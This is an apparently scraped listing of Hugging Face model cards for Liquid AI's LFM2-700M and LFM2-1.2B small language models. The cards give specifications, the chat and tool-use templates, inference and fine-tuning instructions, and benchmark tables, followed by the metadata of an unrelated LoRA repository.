<path d="M58.9984 35V6.92308H63.1138V10.9615H63.9984L63.1138 11.9231C63.1138 10.2564 63.6266 8.94872 64.6523 8C65.7036 7.02564 67.101 6.53846 68.8446 6.53846C70.9728 6.53846 72.6651 7.25641 73.9215 8.69231C75.2036 10.1026 75.8446 12.0385 75.8446 14.5V20.4615C75.8446 22.1026 75.5497 23.5256 74.96 24.7308C74.3959 25.9103 73.5882 26.8333 72.5369 27.5C71.5113 28.141 70.2805 28.4615 68.8446 28.4615C67.1266 28.4615 65.742 27.9872 64.6907 27.0385C63.6395 26.0641 63.1138 24.7436 63.1138 23.0769L63.9984 24.0385H63.0369L63.1523 28.9615V35H58.9984ZM67.4215 24.8462C68.7805 24.8462 69.8318 24.4615 70.5754 23.6923C71.3446 22.8974 71.7292 21.7564 71.7292 20.2692V14.7308C71.7292 13.2436 71.3446 12.1154 70.5754 11.3462C69.8318 10.5513 68.7805 10.1538 67.4215 10.1538C66.1138 10.1538 65.0754 10.5641 64.3061 11.3846C63.5369 12.1795 63.1523 13.2949 63.1523 14.7308V20.2692C63.1523 21.7051 63.5369 22.8333 64.3061 23.6538C65.0754 24.4487 66.1138 24.8462 67.4215 24.8462Z"/>
</g>
<linearGradient id="y" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
</div>
</center>
# LFM2-700M
LFM2 is a new generation of hybrid models developed by [Liquid AI](https://www.liquid.ai/), specifically designed for edge AI and on-device deployment. It sets a new standard in terms of quality, speed, and memory efficiency.
We're releasing the weights of four post-trained checkpoints with 350M, 700M, 1.2B, and 2.6B parameters. They provide the following key features to create AI-powered edge applications:
* **Fast training & inference** – LFM2 achieves 3x faster training compared to its previous generation. It also benefits from 2x faster decode and prefill speed on CPU compared to Qwen3.
* **Best performance** – LFM2 outperforms similarly-sized models across multiple benchmark categories, including knowledge, mathematics, instruction following, and multilingual capabilities.
* **New architecture** – LFM2 is a new hybrid Liquid model with multiplicative gates and short convolutions.
* **Flexible deployment** – LFM2 runs efficiently on CPU, GPU, and NPU hardware for flexible deployment on smartphones, laptops, or vehicles.
Find more information about LFM2 in our [blog post](https://www.liquid.ai/blog/liquid-foundation-models-v2-our-second-series-of-generative-ai-models).
## 📄 Model details
Due to their small size, **we recommend fine-tuning LFM2 models on narrow use cases** to maximize performance.
They are particularly suited for agentic tasks, data extraction, RAG, creative writing, and multi-turn conversations.
However, we do not recommend using them for tasks that are knowledge-intensive or require programming skills.
| Property | [**LFM2-350M**](https://huggingface.co/LiquidAI/LFM2-350M) | [**LFM2-700M**](https://huggingface.co/LiquidAI/LFM2-700M) | [**LFM2-1.2B**](https://huggingface.co/LiquidAI/LFM2-1.2B) | [**LFM2-2.6B**](https://huggingface.co/LiquidAI/LFM2-2.6B) |
| ------------------- | ----------------------------- | ----------------------------- | ----------------------------- | ----------------------------- |
| **Parameters** | 354,483,968 | 742,489,344 | 1,170,340,608 | 2,569,272,320 |
| **Layers** | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 30 (22 conv + 8 attn) |
| **Context length** | 32,768 tokens | 32,768 tokens | 32,768 tokens | 32,768 tokens |
| **Vocabulary size** | 65,536 | 65,536 | 65,536 | 65,536 |
| **Precision** | bfloat16 | bfloat16 | bfloat16 | bfloat16 |
| **Training budget** | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens |
| **License** | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 |
**Supported languages**: English, Arabic, Chinese, French, German, Japanese, Korean, and Spanish.
**Generation parameters**: We recommend the following parameters:
* `temperature=0.3`
* `min_p=0.15`
* `repetition_penalty=1.05`
**Chat template**: LFM2 uses a ChatML-like chat template as follows:
```
<|startoftext|><|im_start|>system
You are a helpful assistant trained by Liquid AI.<|im_end|>
<|im_start|>user
What is C. elegans?<|im_end|>
<|im_start|>assistant
It's a tiny nematode that lives in temperate soil environments.<|im_end|>
```
You can automatically apply it using the dedicated [`.apply_chat_template()`](https://huggingface.co/docs/transformers/en/chat_templating#applychattemplate) function from Hugging Face transformers.
**Tool use**: It consists of four main steps:
1. **Function definition**: LFM2 takes JSON function definitions as input (JSON objects between `<|tool_list_start|>` and `<|tool_list_end|>` special tokens), usually in the system prompt
2. **Function call**: LFM2 writes Pythonic function calls (a Python list between `<|tool_call_start|>` and `<|tool_call_end|>` special tokens), as the assistant answer.
3. **Function execution**: The function call is executed and the result is returned (string between `<|tool_response_start|>` and `<|tool_response_end|>` special tokens), as a "tool" role.
4. **Final answer**: LFM2 interprets the outcome of the function call to address the original user prompt in plain text.
Here is a simple example of a conversation using tool use (a Python sketch of steps 1 and 2 follows after it):
```
<|startoftext|><|im_start|>system
List of tools: <|tool_list_start|>[{"name": "get_candidate_status", "description": "Retrieves the current status of a candidate in the recruitment process", "parameters": {"type": "object", "properties": {"candidate_id": {"type": "string", "description": "Unique identifier for the candidate"}}, "required": ["candidate_id"]}}]<|tool_list_end|><|im_end|>
<|im_start|>user
What is the current status of candidate ID 12345?<|im_end|>
<|im_start|>assistant
<|tool_call_start|>[get_candidate_status(candidate_id="12345")]<|tool_call_end|>Checking the current status of candidate ID 12345.<|im_end|>
<|im_start|>tool
<|tool_response_start|>{"candidate_id": "12345", "status": "Interview Scheduled", "position": "Clinical Research Associate", "date": "2023-11-20"}<|tool_response_end|><|im_end|>
<|im_start|>assistant
The candidate with ID 12345 is currently in the "Interview Scheduled" stage for the position of Clinical Research Associate, with an interview date set for 2023-11-20.<|im_end|>
```
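As a rough Python sketch of steps 1 and 2, reusing the `model` and `tokenizer` objects from the Transformers example below and assembling the tool list in the system prompt manually with the special tokens described above:
```python
import json

tools = [{
    "name": "get_candidate_status",
    "description": "Retrieves the current status of a candidate in the recruitment process",
    "parameters": {
        "type": "object",
        "properties": {"candidate_id": {"type": "string", "description": "Unique identifier for the candidate"}},
        "required": ["candidate_id"],
    },
}]

messages = [
    # Step 1: tool definitions go in the system prompt between the dedicated special tokens.
    {"role": "system", "content": f"List of tools: <|tool_list_start|>{json.dumps(tools)}<|tool_list_end|>"},
    {"role": "user", "content": "What is the current status of candidate ID 12345?"},
]

input_ids = tokenizer.apply_chat_template(
    messages, add_generation_prompt=True, return_tensors="pt", tokenize=True
).to(model.device)

# Step 2: the assistant reply should contain a Pythonic call wrapped in
# <|tool_call_start|> ... <|tool_call_end|>, which your application parses and executes.
output = model.generate(
    input_ids, do_sample=True, temperature=0.3, min_p=0.15,
    repetition_penalty=1.05, max_new_tokens=128,
)
print(tokenizer.decode(output[0][input_ids.shape[-1]:], skip_special_tokens=False))
```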
**Architecture**: Hybrid model with multiplicative gates and short convolutions: 10 double-gated short-range LIV convolution blocks and 6 grouped query attention (GQA) blocks.
**Pre-training mixture**: Approximately 75% English, 20% multilingual, and 5% code data sourced from the web and licensed materials.
**Training approach**:
* Knowledge distillation using [LFM1-7B](https://www.liquid.ai/blog/introducing-lfm-7b-setting-new-standards-for-efficient-language-models) as teacher model
* Very large-scale SFT on 50% downstream tasks, 50% general domains
* Custom DPO with length normalization and semi-online datasets
* Iterative model merging
## 🏃 How to run LFM2
### 1. Transformers
To run LFM2, you need to install Hugging Face [`transformers`](https://github.com/huggingface/transformers) v4.55 or a more recent version as follows:
```bash
pip install -U transformers
```
Here is an example of how to generate an answer with transformers in Python:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model and tokenizer
model_id = "LiquidAI/LFM2-700M"
model = AutoModelForCausalLM.from_pretrained(
model_id,
device_map="auto",
torch_dtype="bfloat16",
# attn_implementation="flash_attention_2" <- uncomment on compatible GPU
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
# Generate answer
prompt = "What is C. elegans?"
input_ids = tokenizer.apply_chat_template(
[{"role": "user", "content": prompt}],
add_generation_prompt=True,
return_tensors="pt",
tokenize=True,
).to(model.device)
output = model.generate(
input_ids,
do_sample=True,
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05,
max_new_tokens=512,
)
print(tokenizer.decode(output[0], skip_special_tokens=False))
# <|startoftext|><|im_start|>user
# What is C. elegans?<|im_end|>
# <|im_start|>assistant
# C. elegans, also known as Caenorhabditis elegans, is a small, free-living
# nematode worm (roundworm) that belongs to the phylum Nematoda.
```
You can directly run and test the model with this [Colab notebook](https://colab.research.google.com/drive/1_q3jQ6LtyiuPzFZv7Vw8xSfPU5FwkKZY?usp=sharing).
### 2. vLLM
You need to install [`vLLM`](https://github.com/vllm-project/vllm) v0.10.2 or a more recent version as follows:
```bash
uv pip install vllm==0.10.2 --extra-index-url https://wheels.vllm.ai/0.10.2/ --torch-backend=auto
```
Here is an example of how to use it for inference:
```python
from vllm import LLM, SamplingParams
prompts = [
"What is C. elegans?",
"Say hi in JSON format",
"Define AI in Spanish"
]
sampling_params = SamplingParams(
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05
)
llm = LLM(model="LiquidAI/LFM2-700M")
outputs = llm.generate(prompts, sampling_params)
for output in outputs:
prompt = output.prompt
generated_text = output.outputs[0].text
print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")
```
### 3. llama.cpp
You can run LFM2 with llama.cpp using its [GGUF checkpoint](https://huggingface.co/LiquidAI/LFM2-700M-GGUF). Find more information in the model card.
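A rough sketch (assuming a recent llama.cpp build with the `llama-cli` binary; the quantization file name below is illustrative, so check the GGUF repository for the exact name):
```bash
# Download a quantized checkpoint from the GGUF repository
huggingface-cli download LiquidAI/LFM2-700M-GGUF --include "*Q4_K_M.gguf" --local-dir .

# Start an interactive chat with the recommended sampling settings
llama-cli -m ./LFM2-700M-Q4_K_M.gguf --temp 0.3 --min-p 0.15 --repeat-penalty 1.05 -cnv
```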
## 🔧 How to fine-tune LFM2
We recommend fine-tuning LFM2 models on your use cases to maximize performance.
| Notebook | Description | Link |
|-------|------|------|
| SFT (Unsloth) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Unsloth. | <a href="https://colab.research.google.com/drive/1HROdGaPFt1tATniBcos11-doVaH7kOI3?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (Axolotl) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Axolotl. | <a href="https://colab.research.google.com/drive/155lr5-uYsOJmZfO6_QZPjbs8hA_v8S7t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (TRL) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using TRL. | <a href="https://colab.research.google.com/drive/1j5Hk_SyBb2soUsuhU0eIEA9GwLNRnElF?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| DPO (TRL) | Preference alignment with Direct Preference Optimization (DPO) using TRL. | <a href="https://colab.research.google.com/drive/1MQdsPxFHeZweGsNx4RH7Ia8lG8PiGE1t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
## 📈 Performance
LFM2 outperforms similar-sized models across different evaluation categories.
### 1. Automated benchmarks

| Model | MMLU | GPQA | IFEval | IFBench | GSM8K | MGSM | MMMLU |
|-------|------|------|--------|---------|-------|------|-------|
| LFM2-350M | 43.43 | 27.46 | 65.12 | 16.41 | 30.1 | 29.52 | 37.99 |
| LFM2-700M | 49.9 | 28.48 | 72.23 | 20.56 | 46.4 | 45.36 | 43.28 |
| LFM2-1.2B | *55.23* | **31.47** | **74.89** | *20.7* | *58.3* | *55.04* | **46.73** |
| Qwen3-0.6B | 44.93 | 22.14 | 64.24 | 19.75 | 36.47 | 41.28 | 30.84 |
| Qwen3-1.7B | **59.11** | 27.72 | *73.98* | **21.27** | 51.4 | **66.56** | *46.51* |
| Llama-3.2-1B-Instruct | 46.6 | *28.84* | 52.39 | 16.86 | 35.71 | 29.12 | 38.15 |
| gemma-3-1b-it | 40.08 | 21.07 | 62.9 | 17.72 | **59.59** | 43.6 | 34.43 |
### 2. LLM-as-a-Judge


### 3. Inference
#### Throughput comparison on CPU in ExecuTorch

#### Throughput comparison on CPU in Llama.cpp

## 📬 Contact
If you are interested in custom solutions with edge deployment, please contact [our sales team](https://www.liquid.ai/contact).
|
LiquidAI/LFM2-1.2B
|
LiquidAI
| 2025-09-23T14:49:12Z | 31,961 | 294 |
transformers
|
[
"transformers",
"safetensors",
"lfm2",
"text-generation",
"liquid",
"edge",
"conversational",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-07-10T12:01:50Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
---
<center>
<div style="text-align: center;">
<img
src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/7_6D7rWrLxp2hb6OHSV1p.png"
alt="Liquid AI"
style="width: 100%; max-width: 66%; height: auto; display: inline-block; margin-bottom: 0.5em; margin-top: 0.5em;"
/>
</div>
<div style="display: flex; justify-content: center;">
<a href="https://playground.liquid.ai/chat">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Playground" style="margin-bottom: 1em;">
<title>Playground</title>
<g>
<rect fill="#fff" width="200" height="200"></rect>
<rect fill="url(#x)" x="200" width="800" height="200"></rect>
</g>
<g transform="translate(35, 30) scale(0.45, 0.45)">
<path d="M172.314 129.313L172.219 129.367L206.125 188.18C210.671 195.154 213.324 203.457 213.324 212.382C213.324 220.834 210.956 228.739 206.839 235.479L275.924 213.178L167.853 33.6L141.827 76.9614L172.314 129.313Z" fill="black"/>
<path d="M114.217 302.4L168.492 257.003C168.447 257.003 168.397 257.003 168.352 257.003C143.515 257.003 123.385 237.027 123.385 212.387C123.385 203.487 126.023 195.204 130.55 188.24L162.621 132.503L135.966 86.7327L60.0762 213.183L114.127 302.4H114.217Z" fill="black"/>
<path d="M191.435 250.681C191.435 250.681 191.43 250.681 191.425 250.686L129.71 302.4H221.294L267.71 226.593L191.435 250.686V250.681Z" fill="black"/>
</g>
<g transform="translate(50, 0)" aria-hidden="true" fill="#fff" text-anchor="start" font-family="Verdana,DejaVu Sans,sans-serif" font-size="110">
<text x="255" y="148" textLength="619" fill="#000" opacity="0.1">Playground</text>
<text x="245" y="138" textLength="619">Playground</text>
</g>
<linearGradient id="x" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
<stop offset="100%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
<a href="https://leap.liquid.ai/?utm_source=huggingface&utm_medium=modelcards">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Leap" style="margin-bottom: 1em;">
<title>Leap</title>
<g>
<rect fill="#000" width="500" height="200"></rect>
</g>
<g transform="translate(100, 45) scale(3.5, 3.5)" fill="#fff">
<path d="M13.8512 28.0769C12.5435 28.0769 11.4025 27.8205 10.4281 27.3077C9.45375 26.7692 8.68452 26.0128 8.12042 25.0385C7.58196 24.0641 7.31273 22.9359 7.31273 21.6538V3.76923H0.389648V0H11.4666V21.6538C11.4666 22.4744 11.6973 23.1282 12.1589 23.6154C12.6204 24.0769 13.2486 24.3077 14.0435 24.3077H20.582V28.0769H13.8512Z"/>
<path d="M29.6439 28.4615C27.9259 28.4615 26.4131 28.1282 25.1054 27.4615C23.8233 26.7692 22.8362 25.8077 22.1439 24.5769C21.4516 23.3462 21.1054 21.9103 21.1054 20.2692V14.7308C21.1054 13.0641 21.4516 11.6282 22.1439 10.4231C22.8362 9.19231 23.8233 8.24359 25.1054 7.57692C26.4131 6.88462 27.9259 6.53846 29.6439 6.53846C31.3875 6.53846 32.9003 6.88462 34.1823 7.57692C35.4644 8.24359 36.4516 9.19231 37.1439 10.4231C37.8362 11.6282 38.1823 13.0641 38.1823 14.7308V18.5H25.1054V20.2692C25.1054 21.8333 25.49 23.0256 26.2592 23.8462C27.0541 24.6667 28.1951 25.0769 29.6823 25.0769C30.8875 25.0769 31.8618 24.8718 32.6054 24.4615C33.349 24.0256 33.8105 23.3974 33.99 22.5769H38.1054C37.7977 24.3718 36.8746 25.8077 35.3362 26.8846C33.7977 27.9359 31.9003 28.4615 29.6439 28.4615ZM34.1823 16V14.6923C34.1823 13.1538 33.7977 11.9615 33.0285 11.1154C32.2592 10.2692 31.131 9.84615 29.6439 9.84615C28.1823 9.84615 27.0541 10.2692 26.2592 11.1154C25.49 11.9615 25.1054 13.1667 25.1054 14.7308V15.6923L34.49 15.6538L34.1823 16Z"/>
<path d="M46.3596 28.4615C44.1545 28.4615 42.4109 27.8974 41.1288 26.7692C39.8724 25.6154 39.2442 24.0513 39.2442 22.0769C39.2442 20.0769 39.9109 18.5128 41.2442 17.3846C42.6032 16.2308 44.4622 15.6538 46.8211 15.6538H52.7058V13.6923C52.7058 12.5385 52.3468 11.641 51.6288 11C50.9109 10.359 49.8981 10.0385 48.5904 10.0385C47.4365 10.0385 46.475 10.2949 45.7058 10.8077C44.9365 11.2949 44.4878 11.9487 44.3596 12.7692H40.2827C40.5135 10.8718 41.3852 9.35897 42.8981 8.23077C44.4365 7.10256 46.3724 6.53846 48.7058 6.53846C51.2186 6.53846 53.2058 7.17949 54.6673 8.46154C56.1288 9.71795 56.8596 11.4359 56.8596 13.6154V28.0769H52.8211V24.1923H52.1288L52.8211 23.4231C52.8211 24.9615 52.2314 26.1923 51.0519 27.1154C49.8724 28.0128 48.3083 28.4615 46.3596 28.4615ZM47.5904 25.2692C49.0776 25.2692 50.2955 24.8974 51.2442 24.1538C52.2186 23.3846 52.7058 22.4103 52.7058 21.2308V18.4615H46.8981C45.8211 18.4615 44.9622 18.7564 44.3211 19.3462C43.7058 19.9359 43.3981 20.7436 43.3981 21.7692C43.3981 22.8462 43.7699 23.7051 44.5135 24.3462C45.257 24.9615 46.2827 25.2692 47.5904 25.2692Z"/>
<path d="M58.9984 35V6.92308H63.1138V10.9615H63.9984L63.1138 11.9231C63.1138 10.2564 63.6266 8.94872 64.6523 8C65.7036 7.02564 67.101 6.53846 68.8446 6.53846C70.9728 6.53846 72.6651 7.25641 73.9215 8.69231C75.2036 10.1026 75.8446 12.0385 75.8446 14.5V20.4615C75.8446 22.1026 75.5497 23.5256 74.96 24.7308C74.3959 25.9103 73.5882 26.8333 72.5369 27.5C71.5113 28.141 70.2805 28.4615 68.8446 28.4615C67.1266 28.4615 65.742 27.9872 64.6907 27.0385C63.6395 26.0641 63.1138 24.7436 63.1138 23.0769L63.9984 24.0385H63.0369L63.1523 28.9615V35H58.9984ZM67.4215 24.8462C68.7805 24.8462 69.8318 24.4615 70.5754 23.6923C71.3446 22.8974 71.7292 21.7564 71.7292 20.2692V14.7308C71.7292 13.2436 71.3446 12.1154 70.5754 11.3462C69.8318 10.5513 68.7805 10.1538 67.4215 10.1538C66.1138 10.1538 65.0754 10.5641 64.3061 11.3846C63.5369 12.1795 63.1523 13.2949 63.1523 14.7308V20.2692C63.1523 21.7051 63.5369 22.8333 64.3061 23.6538C65.0754 24.4487 66.1138 24.8462 67.4215 24.8462Z"/>
</g>
<linearGradient id="y" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
</div>
</center>
# LFM2-1.2B
LFM2 is a new generation of hybrid models developed by [Liquid AI](https://www.liquid.ai/), specifically designed for edge AI and on-device deployment. It sets a new standard in terms of quality, speed, and memory efficiency.
We're releasing the weights of four post-trained checkpoints with 350M, 700M, 1.2B, and 2.6B parameters. They provide the following key features to create AI-powered edge applications:
* **Fast training & inference** – LFM2 achieves 3x faster training compared to its previous generation. It also benefits from 2x faster decode and prefill speed on CPU compared to Qwen3.
* **Best performance** – LFM2 outperforms similarly-sized models across multiple benchmark categories, including knowledge, mathematics, instruction following, and multilingual capabilities.
* **New architecture** – LFM2 is a new hybrid Liquid model with multiplicative gates and short convolutions.
* **Flexible deployment** – LFM2 runs efficiently on CPU, GPU, and NPU hardware for flexible deployment on smartphones, laptops, or vehicles.
Find more information about LFM2 in our [blog post](https://www.liquid.ai/blog/liquid-foundation-models-v2-our-second-series-of-generative-ai-models).
## 📄 Model details
Due to their small size, **we recommend fine-tuning LFM2 models on narrow use cases** to maximize performance.
They are particularly suited for agentic tasks, data extraction, RAG, creative writing, and multi-turn conversations.
However, we do not recommend using them for tasks that are knowledge-intensive or require programming skills.
| Property | [**LFM2-350M**](https://huggingface.co/LiquidAI/LFM2-350M) | [**LFM2-700M**](https://huggingface.co/LiquidAI/LFM2-700M) | [**LFM2-1.2B**](https://huggingface.co/LiquidAI/LFM2-1.2B) | [**LFM2-2.6B**](https://huggingface.co/LiquidAI/LFM2-2.6B) |
| ------------------- | ----------------------------- | ----------------------------- | ----------------------------- | ----------------------------- |
| **Parameters** | 354,483,968 | 742,489,344 | 1,170,340,608 | 2,569,272,320 |
| **Layers** | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 30 (22 conv + 8 attn) |
| **Context length** | 32,768 tokens | 32,768 tokens | 32,768 tokens | 32,768 tokens |
| **Vocabulary size** | 65,536 | 65,536 | 65,536 | 65,536 |
| **Precision** | bfloat16 | bfloat16 | bfloat16 | bfloat16 |
| **Training budget** | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens |
| **License** | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 |
**Supported languages**: English, Arabic, Chinese, French, German, Japanese, Korean, and Spanish.
**Generation parameters**: We recommend the following parameters:
* `temperature=0.3`
* `min_p=0.15`
* `repetition_penalty=1.05`
**Chat template**: LFM2 uses a ChatML-like chat template as follows:
```
<|startoftext|><|im_start|>system
You are a helpful assistant trained by Liquid AI.<|im_end|>
<|im_start|>user
What is C. elegans?<|im_end|>
<|im_start|>assistant
It's a tiny nematode that lives in temperate soil environments.<|im_end|>
```
You can automatically apply it using the dedicated [`.apply_chat_template()`](https://huggingface.co/docs/transformers/en/chat_templating#applychattemplate) function from Hugging Face transformers.
**Tool use**: It consists of four main steps:
1. **Function definition**: LFM2 takes JSON function definitions as input (JSON objects between `<|tool_list_start|>` and `<|tool_list_end|>` special tokens), usually in the system prompt
2. **Function call**: LFM2 writes Pythonic function calls (a Python list between `<|tool_call_start|>` and `<|tool_call_end|>` special tokens), as the assistant answer.
3. **Function execution**: The function call is executed and the result is returned (string between `<|tool_response_start|>` and `<|tool_response_end|>` special tokens), as a "tool" role.
4. **Final answer**: LFM2 interprets the outcome of the function call to address the original user prompt in plain text.
Here is a simple example of a conversation using tool use:
```
<|startoftext|><|im_start|>system
List of tools: <|tool_list_start|>[{"name": "get_candidate_status", "description": "Retrieves the current status of a candidate in the recruitment process", "parameters": {"type": "object", "properties": {"candidate_id": {"type": "string", "description": "Unique identifier for the candidate"}}, "required": ["candidate_id"]}}]<|tool_list_end|><|im_end|>
<|im_start|>user
What is the current status of candidate ID 12345?<|im_end|>
<|im_start|>assistant
<|tool_call_start|>[get_candidate_status(candidate_id="12345")]<|tool_call_end|>Checking the current status of candidate ID 12345.<|im_end|>
<|im_start|>tool
<|tool_response_start|>{"candidate_id": "12345", "status": "Interview Scheduled", "position": "Clinical Research Associate", "date": "2023-11-20"}<|tool_response_end|><|im_end|>
<|im_start|>assistant
The candidate with ID 12345 is currently in the "Interview Scheduled" stage for the position of Clinical Research Associate, with an interview date set for 2023-11-20.<|im_end|>
```
**Architecture**: Hybrid model with multiplicative gates and short convolutions: 10 double-gated short-range LIV convolution blocks and 6 grouped query attention (GQA) blocks.
**Pre-training mixture**: Approximately 75% English, 20% multilingual, and 5% code data sourced from the web and licensed materials.
**Training approach**:
* Knowledge distillation using [LFM1-7B](https://www.liquid.ai/blog/introducing-lfm-7b-setting-new-standards-for-efficient-language-models) as teacher model
* Very large-scale SFT on 50% downstream tasks, 50% general domains
* Custom DPO with length normalization and semi-online datasets
* Iterative model merging
## 🏃 How to run LFM2
### 1. Transformers
To run LFM2, you need to install Hugging Face [`transformers`](https://github.com/huggingface/transformers) v4.55 or a more recent version as follows:
```bash
pip install -U transformers
```
Here is an example of how to generate an answer with transformers in Python:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model and tokenizer
model_id = "LiquidAI/LFM2-1.2B"
model = AutoModelForCausalLM.from_pretrained(
model_id,
device_map="auto",
torch_dtype="bfloat16",
# attn_implementation="flash_attention_2" <- uncomment on compatible GPU
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
# Generate answer
prompt = "What is C. elegans?"
input_ids = tokenizer.apply_chat_template(
[{"role": "user", "content": prompt}],
add_generation_prompt=True,
return_tensors="pt",
tokenize=True,
).to(model.device)
output = model.generate(
input_ids,
do_sample=True,
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05,
max_new_tokens=512,
)
print(tokenizer.decode(output[0], skip_special_tokens=False))
# <|startoftext|><|im_start|>user
# What is C. elegans?<|im_end|>
# <|im_start|>assistant
# C. elegans, also known as Caenorhabditis elegans, is a small, free-living
# nematode worm (roundworm) that belongs to the phylum Nematoda.
```
You can directly run and test the model with this [Colab notebook](https://colab.research.google.com/drive/1_q3jQ6LtyiuPzFZv7Vw8xSfPU5FwkKZY?usp=sharing).
### 2. vLLM
You need to install [`vLLM`](https://github.com/vllm-project/vllm) v0.10.2 or a more recent version as follows:
```bash
uv pip install vllm==0.10.2 --extra-index-url https://wheels.vllm.ai/0.10.2/ --torch-backend=auto
```
Here is an example of how to use it for inference:
```python
from vllm import LLM, SamplingParams
prompts = [
"What is C. elegans?",
"Say hi in JSON format",
"Define AI in Spanish"
]
sampling_params = SamplingParams(
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05
)
llm = LLM(model="LiquidAI/LFM2-1.2B")
outputs = llm.generate(prompts, sampling_params)
for output in outputs:
prompt = output.prompt
generated_text = output.outputs[0].text
print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")
```
### 3. llama.cpp
You can run LFM2 with llama.cpp using its [GGUF checkpoint](https://huggingface.co/LiquidAI/LFM2-1.2B-GGUF). Find more information in the model card.
## 🔧 How to fine-tune LFM2
We recommend fine-tuning LFM2 models on your use cases to maximize performance.
| Notebook | Description | Link |
|-------|------|------|
| SFT (Unsloth) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Unsloth. | <a href="https://colab.research.google.com/drive/1HROdGaPFt1tATniBcos11-doVaH7kOI3?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (Axolotl) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Axolotl. | <a href="https://colab.research.google.com/drive/155lr5-uYsOJmZfO6_QZPjbs8hA_v8S7t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (TRL) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using TRL. | <a href="https://colab.research.google.com/drive/1j5Hk_SyBb2soUsuhU0eIEA9GwLNRnElF?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| DPO (TRL) | Preference alignment with Direct Preference Optimization (DPO) using TRL. | <a href="https://colab.research.google.com/drive/1MQdsPxFHeZweGsNx4RH7Ia8lG8PiGE1t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
## 📈 Performance
LFM2 outperforms similar-sized models across different evaluation categories.
### 1. Automated benchmarks

| Model | MMLU | GPQA | IFEval | IFBench | GSM8K | MGSM | MMMLU |
|-------|------|------|--------|---------|-------|------|-------|
| LFM2-350M | 43.43 | 27.46 | 65.12 | 16.41 | 30.1 | 29.52 | 37.99 |
| LFM2-700M | 49.9 | 28.48 | 72.23 | 20.56 | 46.4 | 45.36 | 43.28 |
| LFM2-1.2B | *55.23* | **31.47** | **74.89** | *20.7* | *58.3* | *55.04* | **46.73** |
| Qwen3-0.6B | 44.93 | 22.14 | 64.24 | 19.75 | 36.47 | 41.28 | 30.84 |
| Qwen3-1.7B | **59.11** | 27.72 | *73.98* | **21.27** | 51.4 | **66.56** | *46.51* |
| Llama-3.2-1B-Instruct | 46.6 | *28.84* | 52.39 | 16.86 | 35.71 | 29.12 | 38.15 |
| gemma-3-1b-it | 40.08 | 21.07 | 62.9 | 17.72 | **59.59** | 43.6 | 34.43 |
### 2. LLM-as-a-Judge


### 3. Inference
#### Throughput comparison on CPU in ExecuTorch

#### Throughput comparison on CPU in Llama.cpp

## 📬 Contact
If you are interested in custom solutions with edge deployment, please contact [our sales team](https://www.liquid.ai/contact).
|
aamijar/Llama-2-13b-hf-lora-r8-boolq-epochs2
|
aamijar
| 2025-09-23T14:46:41Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
